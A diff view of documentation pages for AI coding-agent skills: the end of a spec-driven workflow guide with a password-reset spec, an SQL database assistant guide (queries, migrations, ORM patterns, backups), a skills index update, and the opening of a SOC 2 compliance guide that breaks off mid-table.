- Do NOT optimize before all acceptance criteria pass.
- Do NOT refactor before all acceptance criteria pass.
- If you discover a missing requirement, STOP and update the spec first.
**Exit criteria:** All tests pass. All acceptance criteria satisfied.
### Phase 6: Self-Review
**Goal:** Verify implementation matches spec before marking done.
Run through the Self-Review Checklist below. If any item fails, fix it before declaring the task complete.
---
## Self-Review Checklist
Before marking any implementation as done, verify ALL of the following:
- [ ] **Every acceptance criterion has a passing test.** No exceptions. If AC-3 exists, a test for AC-3 exists and passes.
- [ ] **Every edge case has a test.** EC-1 through EC-N all have corresponding test cases.
- [ ] **No scope creep.** The implementation does not include features not in the spec. If you added something, either update the spec or remove it.
- [ ] **API contracts match implementation.** Request/response shapes in code match the spec exactly. Field names, types, status codes — all of it.
- [ ] **Error scenarios tested.** Every error response defined in the spec has a test that triggers it.
- [ ] **Non-functional requirements verified.** If the spec says < 500ms, you have evidence (benchmark, load test, profiling) that it meets the threshold.
- [ ] **Data model matches.** Database schema matches the spec. No extra columns, no missing constraints.
- [ ] **Out-of-scope items not built.** Double-check that nothing from the Out of Scope section leaked into the implementation.
---
## Integration with TDD Guide
Spec-driven workflow and TDD are complementary, not competing:
```
Spec-Driven Workflow TDD (Red-Green-Refactor)
───────────────────── ──────────────────────────
Phase 1: Gather Requirements
Phase 2: Write Spec
Phase 3: Validate Spec
Phase 4: Generate Tests ──→ RED: Tests exist and fail
Phase 5: Implement ──→ GREEN: Minimal code to pass
Phase 6: Self-Review ──→ REFACTOR: Clean up internals
```
**The handoff:** Spec-driven workflow produces the test stubs (Phase 4). TDD takes over from there. The spec tells you WHAT to test. TDD tells you HOW to implement.
Use `engineering-team/tdd-guide` for:
- Red-green-refactor cycle discipline
- Coverage analysis and gap detection
- Framework-specific test patterns (Jest, Pytest, JUnit)
Use `engineering/spec-driven-workflow` for:
- Defining what to build before building it
- Acceptance criteria authoring
- Completeness validation
- Scope control
---
## Examples
### Full Spec: User Password Reset
```markdown
# Spec: Password Reset Flow
**Author:** Engineering Team
**Date:** 2026-03-25
**Status:** Approved
## Context
Users who forget their passwords currently have no self-service recovery option.
Support receives ~200 password reset requests per week, costing approximately
8 hours of support time. This feature eliminates that burden entirely.
## Functional Requirements
- FR-1: The system MUST allow users to request a password reset via email.
- FR-2: The system MUST send a reset link that expires after 1 hour.
- FR-3: The system MUST invalidate all previous reset links when a new one is requested.
- FR-4: The system MUST enforce minimum password length of 8 characters on reset.
- FR-5: The system MUST NOT reveal whether an email exists in the system.
- FR-6: The system SHOULD log all reset attempts for audit purposes.
## Acceptance Criteria
### AC-1: Request reset (FR-1, FR-5)
Given a user on the password reset page
When they enter any email address and submit
Then they see "If an account exists, a reset link has been sent"
And the response is identical whether the email exists or not
### AC-2: Valid reset link (FR-2)
Given a user who received a reset email 30 minutes ago
When they click the reset link
Then they see the password reset form
### AC-3: Expired reset link (FR-2)
Given a user who received a reset email 2 hours ago
When they click the reset link
Then they see "This link has expired. Please request a new one."
### AC-4: Previous links invalidated (FR-3)
Given a user who requested two reset emails
When they click the link from the first email
Then they see "This link is no longer valid."
## Edge Cases
- EC-1: User submits reset for non-existent email → Same success message (FR-5).
- EC-2: User clicks reset link twice → Second click shows "already used" if password was changed.
- EC-3: Email delivery fails → Log error, do not retry automatically.
- EC-4: User requests reset while already logged in → Allow it, do not force logout.
## Out of Scope
- OS-1: Security questions as alternative reset method.
- OS-2: SMS-based password reset.
- OS-3: Admin-initiated password reset (separate spec).
```
### Extracted Test Cases (from above spec)
```python
# Generated by test_extractor.py --framework pytest
class TestPasswordReset:
def test_ac1_request_reset_existing_email(self):
"""AC-1: Request reset with existing email shows generic message."""
# Given a user on the password reset page
# When they enter a registered email and submit
# Then they see "If an account exists, a reset link has been sent"
raise NotImplementedError("Implement this test")
def test_ac1_request_reset_nonexistent_email(self):
"""AC-1: Request reset with unknown email shows same generic message."""
# Given a user on the password reset page
# When they enter an unregistered email and submit
# Then they see identical response to existing email case
raise NotImplementedError("Implement this test")
def test_ac2_valid_reset_link(self):
"""AC-2: Reset link works within expiry window."""
raise NotImplementedError("Implement this test")
def test_ac3_expired_reset_link(self):
"""AC-3: Reset link rejected after 1 hour."""
raise NotImplementedError("Implement this test")
def test_ac4_previous_links_invalidated(self):
"""AC-4: Old reset links stop working when new one is requested."""
raise NotImplementedError("Implement this test")
def test_ec1_nonexistent_email_same_response(self):
"""EC-1: Non-existent email produces identical response."""
raise NotImplementedError("Implement this test")
def test_ec2_reset_link_used_twice(self):
"""EC-2: Already-used reset link shows appropriate message."""
raise NotImplementedError("Implement this test")
```
---
## Anti-Patterns
### 1. Coding Before Spec Approval
**Symptom:** "I'll start coding while the spec is being reviewed."
**Problem:** The review will surface changes. Now you have code that implements a rejected design.
**Rule:** Implementation does not begin until spec status is "Approved."
### 2. Vague Acceptance Criteria
**Symptom:** "The system should work well" or "The UI should be responsive."
**Problem:** Untestable. What does "well" mean? What does "responsive" mean?
**Rule:** Every acceptance criterion must be verifiable by a machine. If you cannot write a test for it, rewrite the criterion.
### 3. Missing Edge Cases
**Symptom:** Happy path is specified, error paths are not.
**Problem:** Developers invent error handling on the fly, leading to inconsistent behavior.
**Rule:** For every external dependency (API, database, file system, user input), specify at least one failure scenario.
### 4. Spec as Post-Hoc Documentation
**Symptom:** "Let me write the spec now that the feature is done."
**Problem:** This is documentation, not specification. It describes what was built, not what should have been built. It cannot catch design errors because the design is already frozen.
**Rule:** If the spec was written after the code, it is not a spec. Relabel it as documentation.
### 5. Gold-Plating Beyond Spec
**Symptom:** "While I was in there, I also added..."
**Problem:** Untested code. Unreviewed design. Potential for subtle bugs in the "bonus" feature.
**Rule:** If it is not in the spec, it does not get built. File a new spec for additional features.
### 6. Acceptance Criteria Without Requirement Traceability
**Symptom:** AC-7 exists but does not reference any FR-* or NFR-*.
**Problem:** Orphaned criteria mean either a requirement is missing or the criterion is unnecessary.
**Rule:** Every AC-* MUST reference at least one FR-* or NFR-*.
### 7. Skipping Validation
**Symptom:** "The spec looks fine, let's just start."
**Problem:** Missing sections discovered during implementation cause blocking delays.
**Rule:** Always run `spec_validator.py --strict` before starting implementation. Fix all warnings.
---
## Cross-References
- **`engineering-team/tdd-guide`** — Red-green-refactor cycle, test generation, coverage analysis. Use after Phase 4 of this workflow.
- **`engineering/focused-fix`** — Deep-dive feature repair. When a spec-driven implementation has systemic issues, use focused-fix for diagnosis.
- **`engineering/rag-architect`** — If the feature involves retrieval or knowledge systems, use rag-architect for the technical design within the spec.
- **`references/spec_format_guide.md`** — Complete template with section-by-section explanations.
- **`references/bounded_autonomy_rules.md`** — Full decision matrix for when to stop vs. continue.
- **`references/acceptance_criteria_patterns.md`** — Pattern library for writing Given/When/Then criteria.
---
## Tools
| Script | Purpose | Key Flags |
|--------|---------|-----------|
| `spec_generator.py` | Generate spec template from feature name/description | `--name`, `--description`, `--format`, `--json` |
| `spec_validator.py` | Validate spec completeness (0-100 score) | `--file`, `--strict`, `--json` |
| `test_extractor.py` | Extract test stubs from acceptance criteria | `--file`, `--framework`, `--output`, `--json` |
```bash
# Generate a spec template
python spec_generator.py --name "User Authentication" --description "OAuth 2.0 login flow"
# Validate a spec
python spec_validator.py --file specs/auth.md --strict
# Extract test cases
python test_extractor.py --file specs/auth.md --framework pytest --output tests/test_auth.py
```

View File

@@ -0,0 +1,468 @@
---
title: "SQL Database Assistant - POWERFUL Tier Skill — Agent Skill for Codex & OpenClaw"
description: "Use when the user asks to write SQL queries, optimize database performance, generate migrations, explore database schemas, or work with ORMs like. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# SQL Database Assistant - POWERFUL Tier Skill
<div class="page-meta" markdown>
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
<span class="meta-badge">:material-identifier: `sql-database-assistant`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/sql-database-assistant/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
</div>
## Overview
The operational companion to database design. While **database-designer** focuses on schema architecture and **database-schema-designer** handles ERD modeling, this skill covers the day-to-day: writing queries, optimizing performance, generating migrations, and bridging the gap between application code and database engines.
### Core Capabilities
- **Natural Language to SQL** — translate requirements into correct, performant queries
- **Schema Exploration** — introspect live databases across PostgreSQL, MySQL, SQLite, SQL Server
- **Query Optimization** — EXPLAIN analysis, index recommendations, N+1 detection, rewrite patterns
- **Migration Generation** — up/down scripts, zero-downtime strategies, rollback plans
- **ORM Integration** — Prisma, Drizzle, TypeORM, SQLAlchemy patterns and escape hatches
- **Multi-Database Support** — dialect-aware SQL with compatibility guidance
### Tools
| Script | Purpose |
|--------|---------|
| `scripts/query_optimizer.py` | Static analysis of SQL queries for performance issues |
| `scripts/migration_generator.py` | Generate migration file templates from change descriptions |
| `scripts/schema_explorer.py` | Generate schema documentation from introspection queries |
---
## Natural Language to SQL
### Translation Patterns
When converting requirements to SQL, follow this sequence:
1. **Identify entities** — map nouns to tables
2. **Identify relationships** — map verbs to JOINs or subqueries
3. **Identify filters** — map adjectives/conditions to WHERE clauses
4. **Identify aggregations** — map "total", "average", "count" to GROUP BY
5. **Identify ordering** — map "top", "latest", "highest" to ORDER BY + LIMIT
### Common Query Templates
**Top-N per group (window function)**
```sql
SELECT * FROM (
SELECT *, ROW_NUMBER() OVER (PARTITION BY department_id ORDER BY salary DESC) AS rn
FROM employees
) ranked WHERE rn <= 3;
```
**Running totals**
```sql
SELECT date, amount,
SUM(amount) OVER (ORDER BY date ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW) AS running_total
FROM transactions;
```
**Gap detection**
```sql
SELECT curr.id, curr.seq_num, prev.seq_num AS prev_seq
FROM records curr
LEFT JOIN records prev ON prev.seq_num = curr.seq_num - 1
WHERE prev.id IS NULL AND curr.seq_num > 1;
```
**UPSERT (PostgreSQL)**
```sql
INSERT INTO settings (key, value, updated_at)
VALUES ('theme', 'dark', NOW())
ON CONFLICT (key) DO UPDATE SET value = EXCLUDED.value, updated_at = EXCLUDED.updated_at;
```
**UPSERT (MySQL)**
```sql
INSERT INTO settings (key_name, value, updated_at)
VALUES ('theme', 'dark', NOW())
ON DUPLICATE KEY UPDATE value = VALUES(value), updated_at = VALUES(updated_at);
```
> See references/query_patterns.md for JOINs, CTEs, window functions, JSON operations, and more.
---
## Schema Exploration
### Introspection Queries
**PostgreSQL — list tables and columns**
```sql
SELECT table_name, column_name, data_type, is_nullable, column_default
FROM information_schema.columns
WHERE table_schema = 'public'
ORDER BY table_name, ordinal_position;
```
**PostgreSQL — foreign keys**
```sql
SELECT tc.table_name, kcu.column_name,
ccu.table_name AS foreign_table, ccu.column_name AS foreign_column
FROM information_schema.table_constraints tc
JOIN information_schema.key_column_usage kcu ON tc.constraint_name = kcu.constraint_name
JOIN information_schema.constraint_column_usage ccu ON tc.constraint_name = ccu.constraint_name
WHERE tc.constraint_type = 'FOREIGN KEY';
```
**MySQL — table sizes**
```sql
SELECT table_name, table_rows,
ROUND(data_length / 1024 / 1024, 2) AS data_mb,
ROUND(index_length / 1024 / 1024, 2) AS index_mb
FROM information_schema.tables
WHERE table_schema = DATABASE()
ORDER BY data_length DESC;
```
**SQLite — schema dump**
```sql
SELECT name, sql FROM sqlite_master WHERE type = 'table' ORDER BY name;
```
**SQL Server — columns with types**
```sql
SELECT t.name AS table_name, c.name AS column_name,
ty.name AS data_type, c.max_length, c.is_nullable
FROM sys.columns c
JOIN sys.tables t ON c.object_id = t.object_id
JOIN sys.types ty ON c.user_type_id = ty.user_type_id
ORDER BY t.name, c.column_id;
```
### Generating Documentation from Schema
Use `scripts/schema_explorer.py` to produce markdown or JSON documentation:
```bash
python scripts/schema_explorer.py --dialect postgres --tables all --format md
python scripts/schema_explorer.py --dialect mysql --tables users,orders --format json --json
```
---
## Query Optimization
### EXPLAIN Analysis Workflow
1. **Run EXPLAIN ANALYZE** (PostgreSQL) or **EXPLAIN FORMAT=JSON** (MySQL)
2. **Identify the costliest node** — Seq Scan on large tables, Nested Loop with high row estimates
3. **Check for missing indexes** — sequential scans on filtered columns
4. **Look for estimation errors** — planned vs actual rows divergence signals stale statistics
5. **Evaluate JOIN order** — ensure the smallest result set drives the join
### Index Recommendation Checklist
- Columns in WHERE clauses with high selectivity
- Columns in JOIN conditions (foreign keys)
- Columns in ORDER BY when combined with LIMIT
- Composite indexes matching multi-column WHERE predicates (most selective column first)
- Partial indexes for queries with constant filters (e.g., `WHERE status = 'active'`)
- Covering indexes to avoid table lookups for read-heavy queries
### Query Rewriting Patterns
| Anti-Pattern | Rewrite |
|-------------|---------|
| `SELECT * FROM orders` | `SELECT id, status, total FROM orders` (explicit columns) |
| `WHERE YEAR(created_at) = 2025` | `WHERE created_at >= '2025-01-01' AND created_at < '2026-01-01'` (sargable) |
| Correlated subquery in SELECT | LEFT JOIN with aggregation |
| `NOT IN (SELECT ...)` with NULLs | `NOT EXISTS (SELECT 1 ...)` |
| `UNION` (dedup) when not needed | `UNION ALL` |
| `LIKE '%search%'` | Full-text search index (GIN/FULLTEXT) |
| `ORDER BY RAND()` | Application-side random sampling or `TABLESAMPLE` |
### N+1 Detection
**Symptoms:**
- Application loop that executes one query per parent row
- ORM lazy-loading related entities inside a loop
- Query log shows hundreds of identical SELECT patterns with different IDs
**Fixes:**
- Use eager loading (`include` in Prisma, `joinedload` in SQLAlchemy)
- Batch queries with `WHERE id IN (...)`
- Use DataLoader pattern for GraphQL resolvers
### Static Analysis Tool
```bash
python scripts/query_optimizer.py --query "SELECT * FROM orders WHERE status = 'pending'" --dialect postgres
python scripts/query_optimizer.py --query queries.sql --dialect mysql --json
```
> See references/optimization_guide.md for EXPLAIN plan reading, index types, and connection pooling.
---
## Migration Generation
### Zero-Downtime Migration Patterns
**Adding a column (safe)**
```sql
-- Up
ALTER TABLE users ADD COLUMN phone VARCHAR(20);
-- Down
ALTER TABLE users DROP COLUMN phone;
```
**Renaming a column (expand-contract)**
```sql
-- Step 1: Add new column
ALTER TABLE users ADD COLUMN full_name VARCHAR(255);
-- Step 2: Backfill
UPDATE users SET full_name = name;
-- Step 3: Deploy app reading both columns
-- Step 4: Deploy app writing only new column
-- Step 5: Drop old column
ALTER TABLE users DROP COLUMN name;
```
**Adding a NOT NULL column (safe sequence)**
```sql
-- Step 1: Add nullable
ALTER TABLE orders ADD COLUMN region VARCHAR(50);
-- Step 2: Backfill with default
UPDATE orders SET region = 'unknown' WHERE region IS NULL;
-- Step 3: Add constraint
ALTER TABLE orders ALTER COLUMN region SET NOT NULL;
ALTER TABLE orders ALTER COLUMN region SET DEFAULT 'unknown';
```
**Index creation (non-blocking, PostgreSQL)**
```sql
CREATE INDEX CONCURRENTLY idx_orders_status ON orders (status);
```
### Data Backfill Strategies
- **Batch updates** — process in chunks of 1000-10000 rows to avoid lock contention
- **Background jobs** — run backfills asynchronously with progress tracking
- **Dual-write** — write to old and new columns during transition period
- **Validation queries** — verify row counts and data integrity after each batch
### Rollback Strategies
Every migration must have a reversible down script. For irreversible changes:
1. **Backup before execution**`pg_dump` the affected tables
2. **Feature flags** — application can switch between old/new schema reads
3. **Shadow tables** — keep a copy of the original table during migration window
### Migration Generator Tool
```bash
python scripts/migration_generator.py --change "add email_verified boolean to users" --dialect postgres --format sql
python scripts/migration_generator.py --change "rename column name to full_name in customers" --dialect mysql --format alembic --json
```
---
## Multi-Database Support
### Dialect Differences
| Feature | PostgreSQL | MySQL | SQLite | SQL Server |
|---------|-----------|-------|--------|------------|
| UPSERT | `ON CONFLICT DO UPDATE` | `ON DUPLICATE KEY UPDATE` | `ON CONFLICT DO UPDATE` | `MERGE` |
| Boolean | Native `BOOLEAN` | `TINYINT(1)` | `INTEGER` | `BIT` |
| Auto-increment | `SERIAL` / `GENERATED` | `AUTO_INCREMENT` | `INTEGER PRIMARY KEY` | `IDENTITY` |
| JSON | `JSONB` (indexed) | `JSON` | Text (ext) | `NVARCHAR(MAX)` |
| Array | Native `ARRAY` | Not supported | Not supported | Not supported |
| CTE (recursive) | Full support | 8.0+ | 3.8.3+ | Full support |
| Window functions | Full support | 8.0+ | 3.25.0+ | Full support |
| Full-text search | `tsvector` + GIN | `FULLTEXT` index | FTS5 extension | Full-text catalog |
| LIMIT/OFFSET | `LIMIT n OFFSET m` | `LIMIT n OFFSET m` | `LIMIT n OFFSET m` | `OFFSET m ROWS FETCH NEXT n ROWS ONLY` |
### Compatibility Tips
- **Always use parameterized queries** — prevents SQL injection across all dialects
- **Avoid dialect-specific functions in shared code** — wrap in adapter layer
- **Test migrations on target engine** — `information_schema` varies between engines
- **Use ISO date format** — `'YYYY-MM-DD'` works everywhere
- **Quote identifiers** — use double quotes (SQL standard) or backticks (MySQL)
---
## ORM Patterns
### Prisma
**Schema definition**
```prisma
model User {
id Int @id @default(autoincrement())
email String @unique
name String?
posts Post[]
createdAt DateTime @default(now())
}
model Post {
id Int @id @default(autoincrement())
title String
author User @relation(fields: [authorId], references: [id])
authorId Int
}
```
**Migrations**: `npx prisma migrate dev --name add_user_email`
**Query API**: `prisma.user.findMany({ where: { email: { contains: '@' } }, include: { posts: true } })`
**Raw SQL escape hatch**: `prisma.$queryRaw\`SELECT * FROM users WHERE id = ${userId}\``
### Drizzle
**Schema-first definition**
```typescript
export const users = pgTable('users', {
id: serial('id').primaryKey(),
email: varchar('email', { length: 255 }).notNull().unique(),
name: text('name'),
createdAt: timestamp('created_at').defaultNow(),
});
```
**Query builder**: `db.select().from(users).where(eq(users.email, email))`
**Migrations**: `npx drizzle-kit generate:pg` then `npx drizzle-kit push:pg`
### TypeORM
**Entity decorators**
```typescript
@Entity()
export class User {
@PrimaryGeneratedColumn()
id: number;
@Column({ unique: true })
email: string;
@OneToMany(() => Post, post => post.author)
posts: Post[];
}
```
**Repository pattern**: `userRepo.find({ where: { email }, relations: ['posts'] })`
**Migrations**: `npx typeorm migration:generate -n AddUserEmail`
### SQLAlchemy
**Declarative models**
```python
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
email = Column(String(255), unique=True, nullable=False)
name = Column(String(255))
posts = relationship('Post', back_populates='author')
```
**Session management**: Always use `with Session() as session:` context manager
**Alembic migrations**: `alembic revision --autogenerate -m "add user email"`
> See references/orm_patterns.md for side-by-side comparisons and migration workflows per ORM.
---
## Data Integrity
### Constraint Strategy
- **Primary keys** — every table must have one; prefer surrogate keys (serial/UUID)
- **Foreign keys** — enforce referential integrity; define ON DELETE behavior explicitly
- **UNIQUE constraints** — for business-level uniqueness (email, slug, API key)
- **CHECK constraints** — validate ranges, enums, and business rules at the DB level
- **NOT NULL** — default to NOT NULL; make nullable only when genuinely optional
### Transaction Isolation Levels
| Level | Dirty Read | Non-Repeatable Read | Phantom Read | Use Case |
|-------|-----------|-------------------|-------------|----------|
| READ UNCOMMITTED | Yes | Yes | Yes | Never recommended |
| READ COMMITTED | No | Yes | Yes | Default for PostgreSQL, general OLTP |
| REPEATABLE READ | No | No | Yes (InnoDB: No) | Financial calculations |
| SERIALIZABLE | No | No | No | Critical consistency (billing, inventory) |
### Deadlock Prevention
1. **Consistent lock ordering** — always acquire locks in the same table/row order
2. **Short transactions** — minimize time between first lock and commit
3. **Advisory locks** — use `pg_advisory_lock()` for application-level coordination
4. **Retry logic** — catch deadlock errors and retry with exponential backoff
---
## Backup & Restore
### PostgreSQL
```bash
# Full backup
pg_dump -Fc --no-owner dbname > backup.dump
# Restore
pg_restore -d dbname --clean --no-owner backup.dump
# Point-in-time recovery: configure WAL archiving + restore_command
```
### MySQL
```bash
# Full backup
mysqldump --single-transaction --routines --triggers dbname > backup.sql
# Restore
mysql dbname < backup.sql
# Binary log for PITR: mysqlbinlog --start-datetime="2025-01-01 00:00:00" binlog.000001
```
### SQLite
```bash
# Backup (safe with concurrent reads)
sqlite3 dbname ".backup backup.db"
```
### Backup Best Practices
- **Automate** — cron or systemd timer, never manual-only
- **Test restores** — untested backups are not backups
- **Offsite copies** — S3, GCS, or separate region
- **Retention policy** — daily for 7 days, weekly for 4 weeks, monthly for 12 months
- **Monitor backup size and duration** — sudden changes signal issues
---
## Anti-Patterns
| Anti-Pattern | Problem | Fix |
|-------------|---------|-----|
| `SELECT *` | Transfers unnecessary data, breaks on schema changes | Explicit column list |
| Missing indexes on FK columns | Slow JOINs and cascading deletes | Add indexes on all foreign keys |
| N+1 queries | 1 + N round trips to database | Eager loading or batch queries |
| Implicit type coercion | `WHERE id = '123'` prevents index use | Match types in predicates |
| No connection pooling | Exhausts connections under load | PgBouncer, ProxySQL, or ORM pool |
| Unbounded queries | No LIMIT risks returning millions of rows | Always paginate |
| Storing money as FLOAT | Rounding errors | Use `DECIMAL(19,4)` or integer cents |
| God tables | One table with 50+ columns | Normalize or use vertical partitioning |
| Soft deletes everywhere | Complicates every query with `WHERE deleted_at IS NULL` | Archive tables or event sourcing |
| Raw string concatenation | SQL injection | Parameterized queries always |
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| **database-designer** | Schema architecture, normalization analysis, ERD generation |
| **database-schema-designer** | Visual ERD modeling, relationship mapping |
| **migration-architect** | Complex multi-step migration orchestration |
| **api-design-reviewer** | Ensuring API endpoints align with query patterns |
| **observability-platform** | Query performance monitoring, slow query alerts |

View File

@@ -1,13 +1,13 @@
---
title: "Regulatory & Quality Skills — Agent Skills & Codex Plugins"
description: "13 regulatory & quality skills — regulatory and quality management agent skill for ISO 13485, MDR, FDA, and GDPR compliance. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
description: "14 regulatory & quality skills — regulatory and quality management agent skill for ISO 13485, MDR, FDA, and GDPR compliance. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
---
<div class="domain-header" markdown>
# :material-shield-check-outline: Regulatory & Quality
<p class="domain-count">13 skills in this domain</p>
<p class="domain-count">14 skills in this domain</p>
</div>
@@ -95,4 +95,10 @@ description: "13 regulatory & quality skills — regulatory and quality manageme
ISO 14971:2019 risk management implementation throughout the medical device lifecycle.
- **[SOC 2 Compliance](soc2-compliance.md)**
---
SOC 2 Type I and Type II compliance preparation for SaaS companies. Covers Trust Service Criteria mapping, control ma...
</div>

View File

@@ -0,0 +1,428 @@
---
title: "SOC 2 Compliance — Agent Skill for Compliance"
description: "Use when the user asks to prepare for SOC 2 audits, map Trust Service Criteria, build control matrices, collect audit evidence, perform gap analysis. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# SOC 2 Compliance
<div class="page-meta" markdown>
<span class="meta-badge">:material-shield-check-outline: Regulatory & Quality</span>
<span class="meta-badge">:material-identifier: `soc2-compliance`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/soc2-compliance/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install ra-qm-skills</code>
</div>
SOC 2 Type I and Type II compliance preparation for SaaS companies. Covers Trust Service Criteria mapping, control matrix generation, evidence collection, gap analysis, and audit readiness assessment.
## Table of Contents
- [Overview](#overview)
- [Trust Service Criteria](#trust-service-criteria)
- [Control Matrix Generation](#control-matrix-generation)
- [Gap Analysis Workflow](#gap-analysis-workflow)
- [Evidence Collection](#evidence-collection)
- [Audit Readiness Checklist](#audit-readiness-checklist)
- [Vendor Management](#vendor-management)
- [Continuous Compliance](#continuous-compliance)
- [Anti-Patterns](#anti-patterns)
- [Tools](#tools)
- [References](#references)
- [Cross-References](#cross-references)
---
## Overview
### What Is SOC 2?
SOC 2 (System and Organization Controls 2) is an auditing framework developed by the AICPA that evaluates how a service organization manages customer data. It applies to any technology company that stores, processes, or transmits customer information — primarily SaaS, cloud infrastructure, and managed service providers.
### Type I vs Type II
| Aspect | Type I | Type II |
|--------|--------|---------|
| **Scope** | Design of controls at a point in time | Design AND operating effectiveness over a period |
| **Duration** | Snapshot (single date) | Observation window (3-12 months, typically 6) |
| **Evidence** | Control descriptions, policies | Control descriptions + operating evidence (logs, tickets, screenshots) |
| **Cost** | $20K-$50K (audit fees) | $30K-$100K+ (audit fees) |
| **Timeline** | 1-2 months (audit phase) | 6-12 months (observation + audit) |
| **Best For** | First-time compliance, rapid market need | Mature organizations, enterprise customers |
### Who Needs SOC 2?
- **SaaS companies** selling to enterprise customers
- **Cloud infrastructure providers** handling customer workloads
- **Data processors** managing PII, PHI, or financial data
- **Managed service providers** with access to client systems
- **Any vendor** whose customers require third-party assurance
### Typical Journey
```
Gap Assessment → Remediation → Type I Audit → Observation Period → Type II Audit → Annual Renewal
(4-8 wk) (8-16 wk) (4-6 wk) (6-12 mo) (4-6 wk) (ongoing)
```
---
## Trust Service Criteria
SOC 2 is organized around five Trust Service Criteria (TSC) categories. **Security** is required for every SOC 2 report; the remaining four are optional and selected based on business need.
### Security (Common Criteria CC1-CC9) — Required
The foundation of every SOC 2 report. Maps to COSO 2013 principles.
| Criteria | Domain | Key Controls |
|----------|--------|-------------|
| **CC1** | Control Environment | Integrity/ethics, board oversight, org structure, competence, accountability |
| **CC2** | Communication & Information | Internal/external communication, information quality |
| **CC3** | Risk Assessment | Risk identification, fraud risk, change impact analysis |
| **CC4** | Monitoring Activities | Ongoing monitoring, deficiency evaluation, corrective actions |
| **CC5** | Control Activities | Policies/procedures, technology controls, deployment through policies |
| **CC6** | Logical & Physical Access | Access provisioning, authentication, encryption, physical restrictions |
| **CC7** | System Operations | Vulnerability management, anomaly detection, incident response |
| **CC8** | Change Management | Change authorization, testing, approval, emergency changes |
| **CC9** | Risk Mitigation | Vendor/business partner risk management |
### Availability (A1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **A1.1** | Capacity management | Infrastructure scaling, resource monitoring, capacity planning |
| **A1.2** | Recovery operations | Backup procedures, disaster recovery, BCP testing |
| **A1.3** | Recovery testing | DR drills, failover testing, RTO/RPO validation |
**Select when:** Customers depend on your uptime; you have SLAs; downtime causes direct business impact.
### Confidentiality (C1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **C1.1** | Identification | Data classification policy, confidential data inventory |
| **C1.2** | Protection | Encryption at rest and in transit, DLP, access restrictions |
| **C1.3** | Disposal | Secure deletion procedures, media sanitization, retention enforcement |
**Select when:** You handle trade secrets, proprietary data, or contractually confidential information.
### Processing Integrity (PI1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **PI1.1** | Accuracy | Input validation, processing checks, output verification |
| **PI1.2** | Completeness | Transaction monitoring, reconciliation, error handling |
| **PI1.3** | Timeliness | SLA monitoring, processing delay alerts, batch job monitoring |
| **PI1.4** | Authorization | Processing authorization controls, segregation of duties |
**Select when:** Data accuracy is critical (financial processing, healthcare records, analytics platforms).
### Privacy (P1-P8) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **P1** | Notice | Privacy policy, data collection notice, purpose limitation |
| **P2** | Choice & Consent | Opt-in/opt-out, consent management, preference tracking |
| **P3** | Collection | Minimal collection, lawful basis, purpose specification |
| **P4** | Use, Retention, Disposal | Purpose limitation, retention schedules, secure disposal |
| **P5** | Access | Data subject access requests, correction rights |
| **P6** | Disclosure & Notification | Third-party sharing, breach notification |
| **P7** | Quality | Data accuracy verification, correction mechanisms |
| **P8** | Monitoring & Enforcement | Privacy program monitoring, complaint handling |
**Select when:** You process PII and customers expect privacy assurance (complements GDPR compliance).
---
## Control Matrix Generation
A control matrix maps each TSC criterion to specific controls, owners, evidence, and testing procedures.
### Matrix Structure
| Field | Description |
|-------|-------------|
| **Control ID** | Unique identifier (e.g., SEC-001, AVL-003) |
| **TSC Mapping** | Which criteria the control addresses (e.g., CC6.1, A1.2) |
| **Control Description** | What the control does |
| **Control Type** | Preventive, Detective, or Corrective |
| **Owner** | Responsible person/team |
| **Frequency** | Continuous, Daily, Weekly, Monthly, Quarterly, Annual |
| **Evidence Type** | Screenshot, Log, Policy, Config, Ticket |
| **Testing Procedure** | How the auditor verifies the control |
### Control Naming Convention
```
{CATEGORY}-{NUMBER}
SEC-001 through SEC-NNN → Security
AVL-001 through AVL-NNN → Availability
CON-001 through CON-NNN → Confidentiality
PRI-001 through PRI-NNN → Processing Integrity
PRV-001 through PRV-NNN → Privacy
```
### Workflow
1. Select applicable TSC categories based on business needs
2. Run `control_matrix_builder.py` to generate the baseline matrix
3. Customize controls to match your actual environment
4. Assign owners and evidence requirements
5. Validate coverage — every selected TSC criterion must have at least one control
---
## Gap Analysis Workflow
### Phase 1: Current State Assessment
1. **Document existing controls** — inventory all security policies, procedures, and technical controls
2. **Map to TSC** — align existing controls to Trust Service Criteria
3. **Collect evidence samples** — gather proof that controls exist and operate
4. **Interview control owners** — verify understanding and execution
### Phase 2: Gap Identification
Run `gap_analyzer.py` against your current controls to identify:
- **Missing controls** — TSC criteria with no corresponding control
- **Partially implemented** — Control exists but lacks evidence or consistency
- **Design gaps** — Control designed but does not adequately address the criteria
- **Operating gaps** (Type II only) — Control designed correctly but not operating effectively
### Phase 3: Remediation Planning
For each gap, define:
| Field | Description |
|-------|-------------|
| Gap ID | Reference identifier |
| TSC Criteria | Affected criteria |
| Gap Description | What is missing or insufficient |
| Remediation Action | Specific steps to close the gap |
| Owner | Person responsible for remediation |
| Priority | Critical / High / Medium / Low |
| Target Date | Completion deadline |
| Dependencies | Other gaps or projects that must complete first |
### Phase 4: Timeline Planning
| Priority | Target Remediation |
|----------|--------------------|
| Critical | 2-4 weeks |
| High | 4-8 weeks |
| Medium | 8-12 weeks |
| Low | 12-16 weeks |
---
## Evidence Collection
### Evidence Types by Control Category
| Control Area | Primary Evidence | Secondary Evidence |
|--------------|-----------------|-------------------|
